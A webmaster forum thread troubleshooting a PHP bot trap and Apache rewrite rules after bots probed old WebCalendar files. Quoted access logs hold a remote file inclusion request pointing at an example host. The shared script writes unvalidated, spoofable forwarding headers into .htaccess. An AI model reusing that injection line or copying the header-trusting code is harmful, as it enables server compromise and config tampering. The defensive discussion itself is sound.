Forum Moderators: coopster
[Thu Sep 27 12:19:07 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/<wbr
[Thu Sep 27 12:19:10 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/ws
[Thu Sep 27 12:19:12 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/<wbr
[Thu Sep 27 12:19:29 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/<wbr
In the access files, for the same period and the same IP, I find the equivalent entries, which are a clearly recognisable hack attempt aimed at my bot-trap files - but not getting caught by them.
202.57.69.xx - - [27/Sep/2007:12:19:07 +0100] "GET /WebCalendar/%3Cwbr%20/%3Eview_entry.php?id=25&date=20070703//ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
202.57.69.xx - - [27/Sep/2007:12:19:10 +0100] "GET //ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
202.57.69.xx - - [27/Sep/2007:12:19:12 +0100] "GET /WebCalendar/%3Cwbr%20//ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
202.57.69.xx - - [27/Sep/2007:12:19:29 +0100] "GET /WebCalendar/%3Cwbr%20/%3Eview_entry.php?id=29&date=20070719//ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
The files this bot was accessing, according to the access log, were my bot traps (view_entry.php, get_events.php), yet they didn't get sprung and the bot's IP did not get added to my .htaccess file. I know the traps are working because they trap ME if I go to them.
I suspect that it has something to do with that "<wbr" string in the error file entry, and the equivalent "%3Cwbr%20" string in the access file entry.
I've added this Philippines-based IP address to my ban list anyway, but I was curious as to how they avoided the trap.
Thanks in advance.
[edited by: jatar_k at 12:15 pm (utc) on Sep. 27, 2007]
[edit reason] examplified and no specific ips thanks [/edit]
However there is another solution -
If this webcalendar is in an area that humans are very unlikely to get to then why not just ban anyone looking at that area?
I have a bot trap on most of my sites. The traps are reached via a 1x1 clear pixel with no alt attribute, and the directory is disallowed in my robots.txt. Just in case a person actually gets to the page, the first page of the bot trap is a warning telling people to go back and not click on any of the links. If they choose to use any of the links anyway, they are added to my blocked list.
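For anyone wanting to copy that setup, it might look something like the sketch below - the /trap/ directory, pixel.gif, and your_last_warning.php names are made up for illustration (I've used an empty alt so the page still validates). The hidden link goes on a normal page, and robots.txt tells well-behaved crawlers to stay out:

```html
<!-- 1x1 clear pixel with no visible content; humans won't click it,
     and good bots obey robots.txt, so only bad bots follow it -->
<a href="/trap/your_last_warning.php"><img src="/pixel.gif" width="1" height="1" alt="" /></a>
```

and in robots.txt:

```
User-agent: *
Disallow: /trap/
```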
That would save any bother of filtering the URLs to check whether they are allowed or not... just ban them all >:)
And I do have some links to some of the traps that humans won't use, as you describe.
But these particular ones are not accessed by crawling - they get "direct" visits from bots that already know about them. My query is how this particular visitor managed to get to the files without springing the trap.
Basically the fake php file calls a trap script (in the same directory) which writes the IP to .htaccess.
Here is the relevant section of the trap - names changed.
**********************************
<?php
include 'trap-script.php';
?>
************************************
and here is the relevant section of script
************************************
<?php
// author: seven-3-five, 2006-09-04, seven-3-five.blogspot.com
//this script is the meat and potatoes of the bot-trap
// 1. It sends you an email when the page /badbots.php is visited.
//The email contains various info about the visitor.
//2. It adds the directive
//'deny from $ip' ($ip being the visitor's ip address)
//to the bottom of your .htaccess file.
// SERVER VARIABLES USED TO IDENTIFY THE OFFENDING BOT
$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$request = $_SERVER['REQUEST_URI'];
$referer = $_SERVER['HTTP_REFERER'];
// ADD 'deny from $ip' TO THE BOTTOM OF YOUR MAIN .htaccess FILE
$text = 'deny from ' . $ip . "\n";
$file = '/var/www/vhosts/example.org.uk/httpdocs/.htaccess';
add_badbot($text, $file);
// Function add_badbot($text, $file_name): appends $text to $file_name
// make sure PHP has permission to write to $file_name
function add_badbot($text, $file_name) {
$handle = fopen($file_name, 'a');
fwrite($handle, $text);
fclose($handle);
}
****************************************
The bad guy in question was definitely aiming for those files. But he didn't get sprung. If I go for those files, the trap works - and it works for plenty of other visitors. This is the first time I have seen that <wbr string in the logs. It generates a File does not exist message in the error log, but the access log shows it actually looking for a specific trap file. Maybe it's just a badly programmed bot that never actually located the trap - I'm new to this stuff, which is why I posted the actual log entries.
Thanks.
[edited by: eelixduppy at 12:48 pm (utc) on Sep. 27, 2007]
[edit reason] exemplified [/edit]
Also, was that the complete set of code for the bot trap? There seems to be a bit missing. If you are blocking everyone that calls the script, then it doesn't matter whether they have a referring page or not.
btw -
the <wbr> is a word-break tag. Not often used, but it allows browsers to put word breaks in very long words. It's most useful in tables: if you have a very long word like getElementByTagName in a <th> while most of the <td>'s are going to have very short content, you can let the browser break up the header by writing getElement<wbr>ByTagName.
I have seen it used to confuse browsers/scripts, but I haven't seen it used that way against PHP. Usually it turns up when people are trying to inject code into something that shouldn't accept it - like IE with its numerous XSS exploits.
I am going to experiment with it and will report back if I manage to do anything interesting. However, as PHP doesn't parse the (X)HTML, it shouldn't take any notice of those tags.
[edited by: PHP_Chimp at 12:59 pm (utc) on Sep. 27, 2007]
The script excerpts were just that - excerpts. The files as a whole do work, but I just posted the relevant bits to save on length! If you want the whole files, that's fine. I didn't get my notifying "a bad bot has just been banned" email, nor did the IP get added to .htaccess.
Everyone that hits that trap file gets added automatically to my .htaccess - because no humans or good bots should get there.
Have fun. Note that the string in the file is <wbr and not <wbr> - I googled <wbr> and saw what it was meant to be.
Thanks
So here is a quick and dirty version of what I'm using -
<?php
function userIP(){
// NB: switch ($_SERVER) compares the whole array against each string,
// so no case ever matches; test each header explicitly instead.
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
$userip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$userip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
$userip = $_SERVER['HTTP_X_FORWARDED'];
} elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
$userip = $_SERVER['HTTP_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_FORWARDED'])) {
$userip = $_SERVER['HTTP_FORWARDED'];
} else {
$userip = $_SERVER['REMOTE_ADDR'];
}
return $userip;
}
function tel_me(){
$day = date("Y-m-d-(D)-H:i:s",time());
$from = "badbot-watch@example.com\r\n";
$to = "chimp@example.com";
$subject = "Alert: bad robot";
$msg = "A bad bot hit ". $_SERVER['REQUEST_URI'] ."\nat ". $day . " \n";
$msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$msg = wordwrap($msg, 70);
mail($to, $subject, $msg, "From: $from");
}
function block_bot($t, $f){
$fh = fopen($f, 'ab');// open in binary mode just in case
fwrite($fh, $t);
fclose($fh);
}
$bot_ip = userIP();
// block the bot
$txt = "deny from $bot_ip\n";
$file = '/path/to/your/htaccess';
block_bot($txt, $file);
tel_me();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>That was a silly thing to do!</title>
</head>
<body>
<h1>Congratulations</h1>
<p>You have succeeded in getting your self blocked from this site.<br />
You were warned about coming here. Have a nice life.</p>
<p>Bye</p>
</body>
</html>
Assuming your /WebCalendar/ is the non-human-accessible directory, then if you use the following in your .htaccess
RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI} !^WebCalendar/get_lost.php$
RewriteCond %{REQUEST_URI} !^WebCalendar/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the get_lost.php page and your_last_warning
RewriteRule ^(.*)$ /WebCalendar/get_lost.php [L]
# should send everything through this script.
get_lost.php will block them
your_last_warning.php is the page where you can tell them not to click any other links. It is the only safe page in the directory.
Please test this first, as I have just written it out of my head, so there may well be some problems with it. If there are, then come back and I'm sure I or someone else can sort it.
[edited by: PHP_Chimp at 1:41 pm (utc) on Sep. 27, 2007]
However, I don't think it will make any difference to PHP, as it doesn't parse the (X)HTML tags.
[edited by: PHP_Chimp at 1:45 pm (utc) on Sep. 27, 2007]
I first discovered traps about a fortnight ago, along with .htaccess. So it's all been uphill since then. I like the look of that script - I've copied it and will try it out. I'll be back (but not for a while - need more coffee myself!)
As for php - only discovered that when I started installing things like calendars but I don't understand a word of it - just good at cutting and pasting and following instructions. (like a computer!)
Still don't know why I didn't catch that Filipino bot in my net though!
Final question before I go off and try all this out. Can a site sub-directory be given its own .htaccess file and used as a test bed for this sort of stuff?
If you have problems with the .htaccess there is an Apache forum here; they will sort it all out for you. Or come back, but this is PHP, so you may well get a faster (maybe better) answer from the Apache forum.
Good luck.
your_last_warning.php contains a 1x1 transparent GIF image link to get_lost.php, as does my main root index.html file.
robots.txt already had the /trap/ directory so no changes needed there. Search engines know not to go there.
I put the .htaccess fragment in place
I am assuming I do not have to actually put the traps into /WebCalendar/, but can merely rely on the .htaccess fragment to redirect requests for any files in that directory (including ones that aren't there) to /trap/your_last_warning.php?
The htaccess fragment you gave me is denying me access to my site and throwing up a server configuration error.
The line that kills the site is
RewriteRule ^(.*)$ /WebCalendar/get_lost.php [L]
What does that line actually do?
If I remark out that line then I get access again. But I can't figure out the .htaccess combination that both allows my site to work, and will fire the trap if I go looking for a non-existent file in the /WebCalendar directory.
I'm getting error messages about max redirect limits being exceeded.
The actual trap works - if I click on the script it does what it says on the tin.
I'll shoot over to the .htaccess department!
RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI} !^WebCalendar/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /WebCalendar/get_lost.php [L]
# should send everything through this script.
The RewriteCond is a condition that must hold for the RewriteRule to apply.
So the RewriteRule in this case is asking for everything - (.*), any single character . as many times as you like * - to be sent through to the /WebCalendar/get_lost.php page.
If the actual script get_lost.php is in a different location then you will need to change the /WebCalendar/get_lost.php [L] to point to the correct location. The [L] just makes sure that this is the last rule applied, so it stops the server continuing on when you want the request sent to the bot trap.
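One thing worth checking in any of these fragments: in a RewriteCond, %{REQUEST_URI} always begins with a leading slash (e.g. /WebCalendar/foo), while a RewriteRule pattern in a per-directory .htaccess is matched against the path with no leading slash, so a condition anchored as ^WebCalendar/ will never match. A sketch with that taken into account - same example names as above, and test it before relying on it:

```apache
RewriteEngine On
# %{REQUEST_URI} starts with "/", so anchor the conditions with "^/".
# Exclude the two trap pages themselves to avoid a rewrite loop,
# then send everything else under /WebCalendar/ to the trap script.
RewriteCond %{REQUEST_URI} !^/WebCalendar/get_lost\.php$
RewriteCond %{REQUEST_URI} !^/WebCalendar/your_last_warning\.php$
RewriteRule ^WebCalendar/ /WebCalendar/get_lost.php [L]
```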
doesn't crash the site (but doesn't do the job of course)
RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI}!^trap/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /trap/get_lost.php [L]
# should send everything through this script.
DOES crash the site and gives me the error message
[Thu Sep 27 18:30:25 2007] [alert] [client my IP] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$'
Here is a visitor who was hacking away while I was testing
[Thu Sep 27 18:30:25 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/profile.php?mode=register&sid=22568d8c267ef528daf7bae8c890f9a5
[Thu Sep 27 18:30:29 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/posting.php?mode=newtopic&f=7&sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:30 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/posting.php?mode=newtopic&f=7&sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:32 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/viewforum.php?f=7&sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:34 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/phpBB//index.php?sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:38 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/index.php?sid=a52cca456ae9a3ca49174beea8c37027
Grateful for the help. I've also asked in the .htaccess forum.
[edited by: jatar_k at 7:55 pm (utc) on Sep. 27, 2007]
[edit reason] please use exampe.com and remove ips [/edit]
There needs to be a space (or more, so you can use tabs to line things up if you want) between the %{REQUEST_URI} and the !^
Let me know if that helps
edit -
It doesn't seem to be letting that line of code display with a space in there. Just add the space to see if that sorts it.
[edited by: PHP_Chimp at 7:53 pm (utc) on Sep. 27, 2007]
I've got the files in place. /trap/ has both files and they work.
If I then browse to mydomain/WebCalendar/garbage.anythingyoulike
I get my error document because the file doesn't exist, but I don't get banned and it doesn't write my IP to .htaccess
I don't get a bad bot email either.
If I go straight to the /trap/get_lost.php page manually, in the trap folder it does work - I get banned, and my customised 403 page displays.
So - the redirection isn't working but the trap is.
Here is what I have in .htaccess at the moment
Rewriteengine ON
RewriteRule ^$ /index.html [R,NC,L]
RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI} !^trap/your_last_warning.php$
RewriteCond %{REQUEST_URI} !^trap/get_lost.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /trap/get_lost.php [L]
# should send everything through this script.
ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
<Files .htaccess>
order allow,deny
deny from all
</Files>
<FilesMatch "\.php$">
order allow,deny
allow from all
# </FilesMatch>
ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
#<Files .htaccess>
#order allow,deny
#deny from all
#</Files>
#order allow,deny
deny from # long list
#allow from all
</FilesMatch>
Error messages include:
[Thu Sep 27 21:09:36 2007] [error] [client ***.142.249.9] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/rubish
[Thu Sep 27 21:09:39 2007] [error] [client ***.142.249.9] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/rubish
[Thu Sep 27 21:09:47 2007] [error] [client ***.142.249.9] Directory index forbidden by rule: /var/www/vhosts/mydomain/httpdocs/WebCalendar/
Thanks for sticking with this!
The fragment is now:
Rewriteengine ON
RewriteRule ^$ /index.html [R,NC,L]
#
RewriteCond %{REQUEST_URI} !/trap/your_last_warning\.php$
RewriteCond %{REQUEST_URI} !^/trap/get_lost\.php$
# should rewrite everything starting with WebCalendar/ except the warning.php
RewriteRule ^WebCalendar/ /trap/get_lost.php [L]
# should send everything through this script.
ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
<Files .htaccess>
order allow,deny
deny from all
</Files>
<FilesMatch "\.php$">
order allow,deny
allow from all
ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
deny from # list of IPs
</FilesMatch>
*************************end of .htaccess
The folder being redirected is /WebCalendar/
The warning file is /trap/your_last_warning.php
The trap script is /trap/get_lost.php
The result is that a request for something like
"/WebCalendar/anyoldrubbish.whateverfiletype" now fires off the trap, sends me an email, writes the IP to .htaccess and denies access, while displaying a message for an innocent inheritor of a blocked IP to contact the webmaster.
On further attempts to access the site home page they get my customised error page which also has contact details.
All I then need to do is check .htaccess every now and then, move the added IPs into the alphabetically sorted list, and check for any oft-repeated ranges that I can lump together into a banned range rather than leaving them as individual entries.
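That periodic tidy-up can be scripted. A rough sketch, assuming the accumulated deny lines have been pulled out of .htaccess into a working file (the file names here are made up):

```shell
# Sample of accumulated deny lines (in practice: grep '^deny from ' .htaccess):
printf 'deny from 2.2.2.2\ndeny from 1.1.1.1\ndeny from 2.2.2.2\n' > deny-raw.txt
# Sort alphabetically and drop duplicates; review deny-list.txt by hand
# before pasting it back into .htaccess.
sort -u deny-raw.txt > deny-list.txt
cat deny-list.txt
```

Spotting whole ranges to collapse still needs a human eye, but this keeps the list sorted and free of duplicates.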
This is exactly what I wanted. Thanks to those both here and in the php forum for helping me get it right! That will keep the bots chasing old WebCalendar vulnerabilities off my site for a short while!
I am very grateful.
I have a similar emailing script that puts the banned IP into the email so I may try and work that into your emailing script. If I do I'll come back and report. Many many thanks.
The email the script sends is not delivering the IP address of the intruding bot. My error logs give the following - which seems to indicate the problem:
PHP Notice: Undefined variable: bot_ip in /var/www/vhosts/mydomain/httpdocs/trap/get_lost.php on line 33
line 33 of the script reads:
$msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
the resulting bad bot email reads: (there is a blank after "address is" instead of the IP)
************************************
A bad bot hit /WebCalendar/any.file
at 2007-09-28-(Fri)-15:14:40
address is
agent is Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.7)
Gecko/20070914 Firefox/2.0.0.7
*************************************
The get_lost script is here; the "$bot_ip" string seems to work when writing to .htaccess but doesn't seem to return a result when writing the email:
*********************************
<?php
function userIP(){
// NB: switch ($_SERVER) compares the whole array against each string,
// so no case ever matches; test each header explicitly instead.
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
$userip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$userip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
$userip = $_SERVER['HTTP_X_FORWARDED'];
} elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
$userip = $_SERVER['HTTP_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_FORWARDED'])) {
$userip = $_SERVER['HTTP_FORWARDED'];
} else {
$userip = $_SERVER['REMOTE_ADDR'];
}
return $userip;
}
function tel_me(){
$day = date("Y-m-d-(D)-H:i:s",time());
$from = "badbots@mydomain\r\n"; //edit for the right email address
$to = "badbots@mydomain"; //edit for the right email address
$subject = "Alert: bad robot";
$msg = "A bad bot hit ". $_SERVER['REQUEST_URI'] ."\nat ". $day . " \n";
$msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$msg = wordwrap($msg, 70);
mail($to, $subject, $msg, "From: $from");
}
function block_bot($t, $f){
$fh = fopen($f, 'ab');// open in binary mode just in case
fwrite($fh, $t);
fclose($fh);
}
$bot_ip = userIP();
// block the bot
$txt = "deny from $bot_ip\n";
$file = '/var/www/vhosts/mydomain/httpdocs/.htaccess'; //edit for path to your htaccess file
block_bot($txt, $file);
tel_me();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>That was a silly thing to do!</title>
</head>
<body>
<h1>Congratulations</h1>
<p>You have succeeded in getting your self blocked from this site.<br />
You were warned about coming here. Have a nice life.</p>
<p>Bye</p>
</body>
</html>
****************************************
Any ideas why the IP isn't getting into the email?
Many thanks.
All suggestions gratefully received!
SCRIPT called get_lost.php - it is accompanied by a warning page called your_last_warning.php (see .htaccess file)
<?php
function userIP(){
// NB: switch ($_SERVER) compares the whole array against each string,
// so no case ever matches; test each header explicitly instead.
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
$userip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$userip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
$userip = $_SERVER['HTTP_X_FORWARDED'];
} elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
$userip = $_SERVER['HTTP_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_FORWARDED'])) {
$userip = $_SERVER['HTTP_FORWARDED'];
} else {
$userip = $_SERVER['REMOTE_ADDR'];
}
return $userip;
}
function tel_me(){
$day = date("Y-m-d-(D)-H:i:s",time());
$from = "badbots@mydomain\r\n"; //edit for the right email address
$to = "badbots@mydomain"; //edit for the right email address
$subject = "Alert: bad robot";
$msg = "A bad bot hit ". $_SERVER['REQUEST_URI'] ."\nat ". $day . " \n";
$msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$msg = wordwrap($msg, 70);
mail($to, $subject, $msg, "From: $from");
}
function block_bot($t, $f){
$fh = fopen($f, 'ab');// open in binary mode just in case
fwrite($fh, $t);
fclose($fh);
}
$bot_ip = userIP();
// block the bot
$txt = "deny from $bot_ip\n";
$file = '/var/www/vhosts/mydomain/httpdocs/.htaccess'; //edit for path to your htaccess file
block_bot($txt, $file);
tel_me();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>That was a silly thing to do!</title>
</head>
<body>
<h1>Congratulations</h1>
<p>You have succeeded in getting your self blocked from this site.<br />
You were warned about coming here. Have a nice life.</p>
<p>If you have no idea why you have been banned, it may be that you have inherited an IP (Internet Protocol) address from someone who previously used it to try to hack our site. In that case please feel free to email our webmaster, give him your present IP address, and ask for it to be unbanned. Sorry for the inconvenience! If you don't know what your IP address is right now, open another browser window or tab and go to [whatismyip.com...] and it will be displayed on the screen. Then copy and paste it into an email to webmaster AT mydomain and we'll look into it.</p>
<p>Bye</p>
</body>
</html>
.htaccess file:
Rewriteengine ON
RewriteRule ^$ /index.html [R,NC,L]
#
RewriteCond %{REQUEST_URI} !/trap/your_last_warning\.php$
RewriteCond %{REQUEST_URI} !/trap/get_lost\.php$
RewriteCond %{REQUEST_URI} !^/trap/get_lost\.php$
# should rewrite everything starting with WebCalendar/ except the warning.php
RewriteRule ^WebCalendar/ /trap/get_lost.php [L]
# should send everything through this script.
ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
<Files .htaccess>
order allow,deny
deny from all
</Files>
<FilesMatch "\.php$">
order allow,deny
allow from all
ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
deny from # list of IPs
</FilesMatch>
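For what it's worth, the blank "address is" line and the "Undefined variable: bot_ip" notice point at variable scope: $bot_ip is set at file level, but a PHP function body cannot see file-level variables unless they are passed in as a parameter or declared global. A minimal sketch of the parameter approach - build_alert() is a hypothetical helper name, not part of the original script:

```php
<?php
// A PHP function does not see file-level variables like $bot_ip,
// so pass the IP in as a parameter instead.
function build_alert($bot_ip) {
    $day = date("Y-m-d-(D)-H:i:s", time());
    // REQUEST_URI is absent when run from the command line
    $uri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/';
    $msg = "A bad bot hit " . $uri . "\nat " . $day . "\n";
    $msg .= "address is " . $bot_ip . "\n";
    return wordwrap($msg, 70);
}

// tel_me() could be changed the same way, e.g. tel_me($bot_ip), and then
// call: mail($to, $subject, build_alert($bot_ip), "From: $from");
echo build_alert('203.0.113.9'); // 203.0.113.9 is a documentation example IP
```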
However, below is a bit of modified code that will write what you want directly into your .htaccess, inside the <FilesMatch> block.
Change $t to: $t = "\ndeny from $bot_ip\n</FilesMatch>";
function block_bot($t, $f){
$size = filesize($f);
$s = $size-14; // "</FilesMatch>" plus trailing newline == 14 bytes
$fh = fopen($f, 'r+b'); // open in binary mode just in case
fseek($fh, $s);
fwrite($fh, $t);
fclose($fh);
}
Although this works, you may want to think about blocking people manually, as a lot of IPs are dynamic: if you block one, the visitor will renew their connection, get another address, and get blocked again. Each time you add another line of text, the .htaccess file gets larger, and since the server reads this file before anything else is processed, a 20k .htaccess file effectively adds 20k of work to every request made on the server, so it will be a lot slower. Blocking by user agent can be very effective; block by IP when there is no other solution.
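On the user-agent point: a sketch of how that can be done in .htaccess with Apache 2.2-style directives, using the libwww-perl agent from the logs earlier in this thread as the example (test before deploying, and bear in mind user agents are trivially faked):

```apache
# Mark any request whose User-Agent contains "libwww-perl" ...
SetEnvIfNoCase User-Agent "libwww-perl" bad_bot
# ... and refuse marked requests.
Order Allow,Deny
Allow from all
Deny from env=bad_bot
```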
I guess that I should have pointed that out at the beginning, but I wasn't concentrating on the end result...just fixing the script...will try harder next time ;)
I also wondered about letting the IP list grow chronologically from the bottom, putting any ranges at the bottom, and then removing the top half every now and again - say once a week or fortnight, depending on traffic. If it's a regular bot, it will ban itself next time it visits; if it's very irregular, keeping the IP is a waste; and if it's moved on, the IP might as well be unblocked anyway.
Thanks again for the input.